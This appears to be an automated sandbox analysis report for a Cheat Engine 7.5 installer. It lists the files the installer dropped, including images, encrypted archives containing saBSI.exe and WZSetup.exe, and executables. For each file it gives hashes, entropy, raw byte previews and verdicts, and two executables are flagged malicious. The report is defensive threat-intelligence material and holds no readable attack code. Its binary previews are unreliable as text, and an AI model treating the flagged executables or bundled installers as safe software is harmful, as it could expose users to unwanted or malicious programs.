                                                                                                                                                                                                                                    SHA1:019CD56BA687D39D12D4B13991C9A42EA6BA03DA
                                                                                                                                                                                                                                    SHA-256:388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95
                                                                                                                                                                                                                                    SHA-512:17257F15D843E88BB78ADCFB48184B8CE22109CC2C99E709432728A392AFAE7B808ED32289BA397207172DE990A354F15C2459B6797317DA8EA18B040C85787E
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d.....R..........#............................@.............................`.......,......................................................<!.......P..H....@..0.................................................................... ...............................text............................... ..`.rdata..|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...H....P......................@..@................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp
                                                                                                                                                                                                                                    File Type:PNG image data, 768 x 768, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):255196
                                                                                                                                                                                                                                    Entropy (8bit):7.96973939556344
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:6144:SpgUGHaX5IfwHkEe6PgHV90nLp8M8yv0zXqtveJsGfr5:SpghMe6IDop8Mjv0Yv+sGD5
                                                                                                                                                                                                                                    MD5:2C5238DA8AAF78FB2722F82435B59EB0
                                                                                                                                                                                                                                    SHA1:8AB4DBABEFD458CEBCD47C2CB144D79804303954
                                                                                                                                                                                                                                    SHA-256:1AEE87904EAAC431C564438807BDBD8FB34290831E7B3C0A502FDF1EF8EAA6A1
                                                                                                                                                                                                                                    SHA-512:EE71A321042F1DFC9660CE84337AB68C50EA40A2B97A0CA7313C433F2DB39769B17039E628B5EA60E3D4FF87DCB3401D98E4670EE82C88920996A641DEA7EFFA
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:.PNG........IHDR.....................sRGB.........gAMA......a.....pHYs.........j......IDATx^....e.u...}..Y...@P.$.Z....{u...6"Q...@.$H6gI.n..Z"..(.*...J[ .^.gZ..(Q$@..*../......}.y7......../.D..'"n.......@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .......V.z..u.[.#.....4.......[..[....466.fgg
                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp
                                                                                                                                                                                                                                    File Type:PNG image data, 768 x 768, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):254279
                                                                                                                                                                                                                                    Entropy (8bit):7.968301085693523
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:6144:1QdvglrmnluatdNn508GtXT3YoTkT1ZLw9p2Hpsx/F:2dvglo/nX67HW1ZL8EJ2/F
                                                                                                                                                                                                                                    MD5:B24E872BD8F92295273197602AAC8352
                                                                                                                                                                                                                                    SHA1:2A9B0EBE62E21E9993AA5BFAAADE14D2DDA3B291
                                                                                                                                                                                                                                    SHA-256:41031EFC4F7E322DC5FFACC94B9296FB28B9B922B1CE3B3DA13BF659A5FD2985
                                                                                                                                                                                                                                    SHA-512:F08AC681ABC4E0F6D7A1D1F2303169004E67C880F9353C0ED11DFAB3EB511DDF841FA056F4090DA8201C822C66AE55419C48CD87F11B9866FEB46A3FE2C2AF99
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:.PNG........IHDR.....................sRGB.........gAMA......a.....pHYs.........j......IDATx^....f.y...w.......IQ.l..3.,O.'..Lb[".}.bJ.DI...$.j;.D.$....@7z.%;...L..X.,..}m...}..........}o.h,D....{.NU.:u...........@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ ....o.;.o.....m..w.G ..\.h.3.....w..[.VCCCidd
                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp
                                                                                                                                                                                                                                    File Type:PNG image data, 700 x 360, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):75974
                                                                                                                                                                                                                                    Entropy (8bit):7.973739579566582
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:1536:cyfQCzB7fBVwtW5EGtWO7Cemktbbv36SEOW9izF:cyfJ/2WXz7Fbbf61OW9aF
                                                                                                                                                                                                                                    MD5:CD09F361286D1AD2622BA8A57B7613BD
                                                                                                                                                                                                                                    SHA1:4CD3E5D4063B3517A950B9D030841F51F3C5F1B1
                                                                                                                                                                                                                                    SHA-256:B92A31D4853D1B2C4E5B9D9624F40B439856D0C6A517E100978CBDE8D3C47DC8
                                                                                                                                                                                                                                    SHA-512:F73D60C92644E0478107E0402D1C7B4DFA1674F69B41856F74F937A7B57CEAA2B3BE9242F2B59F1FCF71063AAC6CBE16C594618D1A8CDD181510DE3240F31DFF
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:.PNG........IHDR.......h.......(.....pHYs.................sRGB.........gAMA......a...([IDATx.....U./.?...0'.H.%.A$.N....t.+. .1....].8..8...q...D.OQ.t>G...}Z.x.t.(.....#..........vF0'<;!..;.k..].T....t...._U...k.........................................................................................................................................................................[.````````p.c..v*..jii.,.Z.+...B.tySSSc......3.&..........G$J.....:X2v3....mkk.P... ..K.n.X,R.......n.............j.g..].v..>...P}..Mo.z........Am`c.4.h.`..E.F.f..-........G..6............$..=p......Floh.................Fc..mP..R.........50000008".7.)S2.6=..c+P....K.].]=. ..]..{.........$L...IM+. ...!.?.q.g....4..............SZ".Xe..G.-]#..7.!.)]t|VW..-]...}.KW.t..8.."...-.."..`...u.0...uI...q(.N.?.0.J.p..m$/S.H..D.cJx. hU.]q.j...t...T.m......A...Y....r.........0.f....UD.J.V.g0.y/|C.4l!..jix.{V...o.. ..V...9K..7:..D...u....e.|.-.J.Z../. . .. !.:.,...u...50000008R`...W.c.2.(..
                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp
                                                                                                                                                                                                                                    File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):527389
                                                                                                                                                                                                                                    Entropy (8bit):7.995975187354872
                                                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                                                    SSDEEP:12288:ib5kasT/hWZEu58IbccPqwozk/2rYJb69+J2W:M5kzT/hWZjfbccPOzk/aIb3J2W
                                                                                                                                                                                                                                    MD5:F68008B70822BD28C82D13A289DEB418
                                                                                                                                                                                                                                    SHA1:06ABBE109BA6DFD4153D76CD65BFFFAE129C41D8
                                                                                                                                                                                                                                    SHA-256:CC6F4FAF4E8A9F4D2269D1D69A69EA326F789620FB98078CC98597F3CB998589
                                                                                                                                                                                                                                    SHA-512:FA482942E32E14011AE3C6762C638CCB0A0E8EC0055D2327C3ACC381DDDF1400DE79E4E9321A39A418800D072E59C36B94B13B7EB62751D3AEC990FB38CE9253
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:PK.........\zX...............saBSI.exe.Z.pT.u.+i..eW c....&....l.....Y[...-@`....e.....;r.T...MJ3.a.]..h:.VF?.u...T...+..()..;...v..[v...........]....s......[..!.....A!?N..?%&!.....1...}AS...U)._t4.;z........9r....A..G...86l}.....EVk.J......t.[E....w...x..+Wx...gg.Qz>...f...8.q^.?..)~..o..B.!z...)....m.{7..F...w....O.+.l*z..].......I.......v..=....S.i.=.r..J.....!.xI2D...!.5..S..r...Rz..@`......Ol....]4..(......]..K..%.I,.8?]"..Y..k|...%.W.#.p....5.li....r.A.5-......X....B.e.J.s.9...s."..S.NE.Fq...D\...0!....v..../..{....sL(6l.E8g...G...!V......^..|.Dp.k....W-B9.."B-.-...h.(..4.9>..&.3.2<.V.x.|T...Ke}.b.G.&1...!..>..P(..2~....~...S....B.d.$......,...O..B9.`.....X}B......B9.`a.8..0....l..B......|..0.b....N...0....%.^.`..0....{...MY.....4..H.'......Il....(..&.e.:&.X=$...+..P..na...C.~]...n...2..n..a0.U...>.0..2.....`..4...<.0.e..a._f0...[.....2..i._c0..i.^....(.).G.|.....$....^.YR..R...<.`..*...l'@..2...V[..0..B*.s......2x...........`'.(.Y...\.`..$
                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp
                                                                                                                                                                                                                                    File Type:PNG image data, 700 x 360, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):30586
                                                                                                                                                                                                                                    Entropy (8bit):7.919646221064304
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:768:Fk7fJC9WjOI1DaGmnitN039DODp56Ys+9S/IUM+:FktpB4FiQ3qd9S/BN
                                                                                                                                                                                                                                    MD5:9AC6287111CB2B272561781786C46CDD
                                                                                                                                                                                                                                    SHA1:6B02F2307EC17D9325523AF1D27A6CB386C8F543
                                                                                                                                                                                                                                    SHA-256:AB99CDB7D798CB7B7D8517584D546AA4ED54ECA1B808DE6D076710C8A400C8C4
                                                                                                                                                                                                                                    SHA-512:F998A4E0CE14B3898A72E0B8A3F7154FC87D2070BADCFA98582E3B570CA83A562D5A0C95F999A4B396619DB42AB6269A2BAC47702597C5A2C37177441723D837
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:.PNG........IHDR.......h.......(.....pHYs.................sRGB.........gAMA......a...w.IDATx....]Wu.5....$...U....!...t.H"...#9.yI'...30H........$'a6...D..NwB...4.tB.$...'......0.d.z}W.+/-.3.[u.=....S..{X{.i.}....B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!D.1#.I....C.g.~.....1...3_r....OB.!..bJ...2k......;..~....q`.f..ov.B.!...!.w.....<..S..w.}?f.^|..w.s.=o.i..M.!...&2.&...~..mt.a;`.>h.....o.}........n.u..?...B.!D-d.N2../...3g..5k.o...<.....s..7C.I....3f._I.!..B.B....n.i.......f...[..}.........;b...........k.Gg.{.....v...fa...^x_.B.!......dFFF0:....Uf.>...,<{..6..C........g.s.=.f.....;<<|8.!..B.Z...$..../8~....h]o...8.Q./.../..?OB.!...cd.N....^j...;........N.....|......B..`.....W...........*..1..#....C........ ..C...X.|.U.....^...;.x...w../..;6.a....W-Z..$..B4.3t.mpg{{..6;.[.z.8...t..!3t....<Xg.....p....F.o.|.+_y.y.>k..........=.IO.&....Y..a.c.*...k...[....{$.!....
                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp
                                                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):33432
                                                                                                                                                                                                                                    Entropy (8bit):5.359517379714029
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:768:Wj1b3suKzD3S8AktYcFA/Vc6KB5YiR2yAMxkE4gu5P:FzDC8AY8Vclv7jxfu5P
                                                                                                                                                                                                                                    MD5:F39C2690BCCC422B84D70E55F76640E5
                                                                                                                                                                                                                                    SHA1:D8D4D4391BCCB01003065593B719E65767AECF03
                                                                                                                                                                                                                                    SHA-256:3D57182EAC0111FD2827478722394134A39D18B9E61CEC5A053C5550411E3F3A
                                                                                                                                                                                                                                    SHA-512:5D52F1323B1E31A0ECD5403A840D6484053A8808ACC6979F61D1EF0C25708B6B93D98C8D832255F73382472B1207433051904B0E956DCCF469918DFDB6329A45
                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................"...0.............N1... ...@....@.. ...............................O....`..................................0..O....@...............*...X...`......P0..8............................................ ............... ..H............text...T.... ...................... ..`.rsrc........@......................@..@.reloc.......`.......(..............@..B................01......H........#...............................................................0..N........r...p~....o.......o....,,.o....o.....1...o.....o....r...p.(....o....*..o....*...0..3........o....(.......o....,...o....*...o......o....o.....*..0..........r...prO..p(....s.....(....(....r...p(....(..............-...........8...............%..:..o..........o.........i.0.~....+.........r...p(....-H..r...p(....-:..r...p(....-,..r...p(....-{..r...p(....-q..r...p(....-g+h..( ...-_..(........o!...
                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp
                                                                                                                                                                                                                                    File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):6227973
                                                                                                                                                                                                                                    Entropy (8bit):7.999704627939555
                                                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                                                    SSDEEP:98304:ppxj2IwVGwxnd+P0fY8eHeM1euEuR+HW84l7mKN2Yjwov3I7qs4zLGGlFtSNNkoo:ppxZ7k00fxeHejFHW3l113I7d4zLGGTL
                                                                                                                                                                                                                                    MD5:7CC0288A2A8BBE014F9E344F3068C8F1
                                                                                                                                                                                                                                    SHA1:EB47D401AE30A308DD66BDCAFDE06CDD35E25C94
                                                                                                                                                                                                                                    SHA-256:200E9BC4FCF2C6682DDC8C7F172A0D02BEFECD25CA882F66C6ABC868A54B8975
                                                                                                                                                                                                                                    SHA-512:869F0A01EF0BCBBFC501C1786E14BFFEAA2DAAA00210C312874FC67A724C77EF61394BB5854B9A02AF654CD045C4D39AE30D73F1B4EC8AA9E531DFEEA1714476
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:PK........v..U......_..._.....WZSetup.exe.}xT.7..+...{..F.....R4`.Ct..!X.&.....Bp.#......l6c9.zlk-.=.-..Z.....IP..Q.Bk.T.8Q..a.....g..y.{......?Np.^..Z.^..Zko=...Y8..".:...?7...u!................77......uk7m....-l.6.n.TX..Wx_....99YE)..z...q..p.].G.,^yt!K_}.#<..x...../?..t. .O..+p.".....%k.y..o.6ep..$...$.[...!L5.F.(.P.=._..%&....a.........@....pU....|..\.....9.i..]<C..*...Z......$..B.[3.a.Z...>.3...z=7..aT......R..O..glJU.......S...u.3..7\%.-_...?#......F..W.M.^,.o.*.I9rU.S.68.S..^]r.C..z...n.>..q>.:{&..s./+Z.".v.S.GT.3..6....:aM.m....r)......FS...h..c......z....(.F..........S_G.Z,..;.P...-8-...{.........'.q..Y..*B....C.....t)O?&....I.w....r].....U..m.....2.:.>'..)hv<..E..oY......:;.H@?aL8X.z..,....v..@9..x2P...w..i....'..*.....#..G.......l.:`..D.c*.]....q....CT..0.U.P.,Z.$&...(..%.Cba.9.sJ..;%....J.Q.*m.....]..<`..Vk.X./7.Q.:..Pr.r&.x..B....Y...8...yJ....Q...........gRy.GV.T...II.4m(..-.0<.3.6<.H$]6..v7.R...:`..aN<#7%91C^lw'>V
                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp
                                                                                                                                                                                                                                    File Type:PNG image data, 700 x 360, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):48743
                                                                                                                                                                                                                                    Entropy (8bit):7.952703392311964
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:768:RtwR1Dy4rQznr1GYfvLn6froelhVNSyCPtSOeVlTTqYueg:zwR1DybhPwhvSyClSOk/geg
                                                                                                                                                                                                                                    MD5:4CFFF8DC30D353CD3D215FD3A5DBAC24
                                                                                                                                                                                                                                    SHA1:0F4F73F0DDDC75F3506E026EF53C45C6FAFBC87E
                                                                                                                                                                                                                                    SHA-256:0C430E56D69435D8AB31CBB5916A73A47D11EF65B37D289EE7D11130ADF25856
                                                                                                                                                                                                                                    SHA-512:9D616F19C2496BE6E89B855C41BEFC0235E3CE949D2B2AE7719C823F10BE7FE0809BDDFD93E28735B36271083DD802AE349B3AB7B60179B269D4A18C6CEF4139
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:.PNG........IHDR.......h.......(.....pHYs.................sRGB.........gAMA......a.....IDATx...eIu....(..Y31.}q....`...t....Z..8t;x3._@.3.0.{.E.".&.5.g.C..@..%.>r.5....B...O...^.*..s....{.7..{....r..+W...B.P(...B.P(...B.P(...B.P(...B.P(...B.P(...B.P(...B.P(...B.P(...B.P(...B.P(...B.P(...B.P(...B.P(...B.P(...B.P(...B.P(...B.P(...B.P(...B.P(...B.P(...B.P(...B.P(...B.P(...B.P(...B.P(...B.P(...B.P(...B.P(...B.P(.n+.t.B.p.x.....^.?/....p,..7...{.P(...B.H...r.y..|.....{l\tO.|..<..P(....w......o..P(.<h...n[\tO..?......E...}...F.P83....<z.....W..7...w.....?..?.YW(.N.......?N[..E..A..z..[...'.$..'....8...?~.K.|........[#.....6........;.......s.=...}.c...{.._..z....;w..........(../..n...?..??..?.........z.......~....[o.<.......x.).Z.(..s.N..Wb.....f....../.P8.|.......?..#......2vO....F......@.|..w7].|..$..}?.L.Go...A.1..^...j...$.6....~..x...{..IwD`|..?.....?...{..~~........).........`$.......tG....|.n.2..........[..._....e.}.=..<........h.7|?Kg....+
                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp
                                                                                                                                                                                                                                    File Type:PNG image data, 768 x 768, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):254078
                                                                                                                                                                                                                                    Entropy (8bit):7.968268860206608
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:3072:d9rAhuSnngAZK0u2vGWTbQ8VreGWVQx1RiiHs0dfo5yk5BRFOYfKa5ubF3/hlKHV:U/HJGWPQ2wV01RPQ5FoBJc+uHtjdhd3
                                                                                                                                                                                                                                    MD5:9CC8A637A7DE5C9C101A3047C7FBBB33
                                                                                                                                                                                                                                    SHA1:5E7B92E7ED3CA15D31A48EBE0297539368FFF15C
                                                                                                                                                                                                                                    SHA-256:8C5C80BBC6B0FDB367EAB1253517D8B156C85545A2D37D1EE4B78F3041D9B5DB
                                                                                                                                                                                                                                    SHA-512:CF60556817DBA2D7A39B72018F619B0DBEA36FB227526943046B67D1AE501A96C838D6D5E3DA64618592AC1E2FA14D4440BAA91618AA66256F99EA2100A427B4
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:.PNG........IHDR.....................sRGB.........gAMA......a.....pHYs.........j......IDATx^....f.y....:=....H..d[f....I.$.........)..%E7.o..H.H..@...f.%;..{.\_.%R...e.}.........N.t...B....]u...SU_....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .x..mKU....[6..8..@.RA...@ ...#l.....N..
                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp
                                                                                                                                                                                                                                    File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):527389
                                                                                                                                                                                                                                    Entropy (8bit):7.995975187354872
                                                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                                                    SSDEEP:12288:ib5kasT/hWZEu58IbccPqwozk/2rYJb69+J2W:M5kzT/hWZjfbccPOzk/aIb3J2W
                                                                                                                                                                                                                                    MD5:F68008B70822BD28C82D13A289DEB418
                                                                                                                                                                                                                                    SHA1:06ABBE109BA6DFD4153D76CD65BFFFAE129C41D8
                                                                                                                                                                                                                                    SHA-256:CC6F4FAF4E8A9F4D2269D1D69A69EA326F789620FB98078CC98597F3CB998589
                                                                                                                                                                                                                                    SHA-512:FA482942E32E14011AE3C6762C638CCB0A0E8EC0055D2327C3ACC381DDDF1400DE79E4E9321A39A418800D072E59C36B94B13B7EB62751D3AEC990FB38CE9253
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:PK.........\zX...............saBSI.exe.Z.pT.u.+i..eW c....&....l.....Y[...-@`....e.....;r.T...MJ3.a.]..h:.VF?.u...T...+..()..;...v..[v...........]....s......[..!.....A!?N..?%&!.....1...}AS...U)._t4.;z........9r....A..G...86l}.....EVk.J......t.[E....w...x..+Wx...gg.Qz>...f...8.q^.?..)~..o..B.!z...)....m.{7..F...w....O.+.l*z..].......I.......v..=....S.i.=.r..J.....!.xI2D...!.5..S..r...Rz..@`......Ol....]4..(......]..K..%.I,.8?]"..Y..k|...%.W.#.p....5.li....r.A.5-......X....B.e.J.s.9...s."..S.NE.Fq...D\...0!....v..../..{....sL(6l.E8g...G...!V......^..|.Dp.k....W-B9.."B-.-...h.(..4.9>..&.3.2<.V.x.|T...Ke}.b.G.&1...!..>..P(..2~....~...S....B.d.$......,...O..B9.`.....X}B......B9.`a.8..0....l..B......|..0.b....N...0....%.^.`..0....{...MY.....4..H.'......Il....(..&.e.:&.X=$...+..P..na...C.~]...n...2..n..a0.U...>.0..2.....`..4...<.0.e..a._f0...[.....2..i._c0..i.^....(.).G.|.....$....^.YR..R...<.`..*...l'@..2...V[..0..B*.s......2x...........`'.(.Y...\.`..$
                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp
                                                                                                                                                                                                                                    File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):527389
                                                                                                                                                                                                                                    Entropy (8bit):7.995975187354872
                                                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                                                    SSDEEP:12288:ib5kasT/hWZEu58IbccPqwozk/2rYJb69+J2W:M5kzT/hWZjfbccPOzk/aIb3J2W
                                                                                                                                                                                                                                    MD5:F68008B70822BD28C82D13A289DEB418
                                                                                                                                                                                                                                    SHA1:06ABBE109BA6DFD4153D76CD65BFFFAE129C41D8
                                                                                                                                                                                                                                    SHA-256:CC6F4FAF4E8A9F4D2269D1D69A69EA326F789620FB98078CC98597F3CB998589
                                                                                                                                                                                                                                    SHA-512:FA482942E32E14011AE3C6762C638CCB0A0E8EC0055D2327C3ACC381DDDF1400DE79E4E9321A39A418800D072E59C36B94B13B7EB62751D3AEC990FB38CE9253
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:PK.........\zX...............saBSI.exe.Z.pT.u.+i..eW c....&....l.....Y[...-@`....e.....;r.T...MJ3.a.]..h:.VF?.u...T...+..()..;...v..[v...........]....s......[..!.....A!?N..?%&!.....1...}AS...U)._t4.;z........9r....A..G...86l}.....EVk.J......t.[E....w...x..+Wx...gg.Qz>...f...8.q^.?..)~..o..B.!z...)....m.{7..F...w....O.+.l*z..].......I.......v..=....S.i.=.r..J.....!.xI2D...!.5..S..r...Rz..@`......Ol....]4..(......]..K..%.I,.8?]"..Y..k|...%.W.#.p....5.li....r.A.5-......X....B.e.J.s.9...s."..S.NE.Fq...D\...0!....v..../..{....sL(6l.E8g...G...!V......^..|.Dp.k....W-B9.."B-.-...h.(..4.9>..&.3.2<.V.x.|T...Ke}.b.G.&1...!..>..P(..2~....~...S....B.d.$......,...O..B9.`.....X}B......B9.`a.8..0....l..B......|..0.b....N...0....%.^.`..0....{...MY.....4..H.'......Il....(..&.e.:&.X=$...+..P..na...C.~]...n...2..n..a0.U...>.0..2.....`..4...<.0.e..a._f0...[.....2..i._c0..i.^....(.).G.|.....$....^.YR..R...<.`..*...l'@..2...V[..0..B*.s......2x...........`'.(.Y...\.`..$
                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp
                                                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):1184128
                                                                                                                                                                                                                                    Entropy (8bit):6.623147525519113
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:24576:WF66IUpqM/XAl0drYaL6NFEXXN6abiklqOYadJ0CbmpV4CsCa0wDisO4qG:k/M0drYaIaXXOAqOYadJ0Cbmrhq0wTb5
                                                                                                                                                                                                                                    MD5:143255618462A577DE27286A272584E1
                                                                                                                                                                                                                                    SHA1:EFC032A6822BC57BCD0C9662A6A062BE45F11ACB
                                                                                                                                                                                                                                    SHA-256:F5AA950381FBCEA7D730AA794974CA9E3310384A95D6CF4D015FBDBD9797B3E4
                                                                                                                                                                                                                                    SHA-512:C0A084D5C0B645E6A6479B234FA73C405F56310119DD7C8B061334544C47622FDD5139DB9781B339BB3D3E17AC59FDDB7D7860834ECFE8AAD6D2AE8C869E1CB9
                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                    Preview:MZ......................@...................................0...........!..L.!This program cannot be run in DOS mode....$.......2..}vn..vn..vn..-../xn..-../.n..$../bn..$../on..G2r.tn..$../.n..-../on..-../wn..-../yn...../wn...../~n...../Zn..vn..=o...../{n...../hn....p.wn...../wn..Richvn..................PE..L...V..e.....................h...... .............@..................................1....@.............................................p...............................p...................@.......X...@...............0....... ....................text............................... ..`.rdata..............................@..@.data..............................@....didat...............T..............@....rsrc...p............V..............@..@.reloc...............Z..............@..B................................................................................................................................................................................................................
                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp
                                                                                                                                                                                                                                    File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):6227973
                                                                                                                                                                                                                                    Entropy (8bit):7.999704627939555
                                                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                                                    SSDEEP:98304:ppxj2IwVGwxnd+P0fY8eHeM1euEuR+HW84l7mKN2Yjwov3I7qs4zLGGlFtSNNkoo:ppxZ7k00fxeHejFHW3l113I7d4zLGGTL
                                                                                                                                                                                                                                    MD5:7CC0288A2A8BBE014F9E344F3068C8F1
                                                                                                                                                                                                                                    SHA1:EB47D401AE30A308DD66BDCAFDE06CDD35E25C94
                                                                                                                                                                                                                                    SHA-256:200E9BC4FCF2C6682DDC8C7F172A0D02BEFECD25CA882F66C6ABC868A54B8975
                                                                                                                                                                                                                                    SHA-512:869F0A01EF0BCBBFC501C1786E14BFFEAA2DAAA00210C312874FC67A724C77EF61394BB5854B9A02AF654CD045C4D39AE30D73F1B4EC8AA9E531DFEEA1714476
                                                                                                                                                                                                                                    Malicious:false
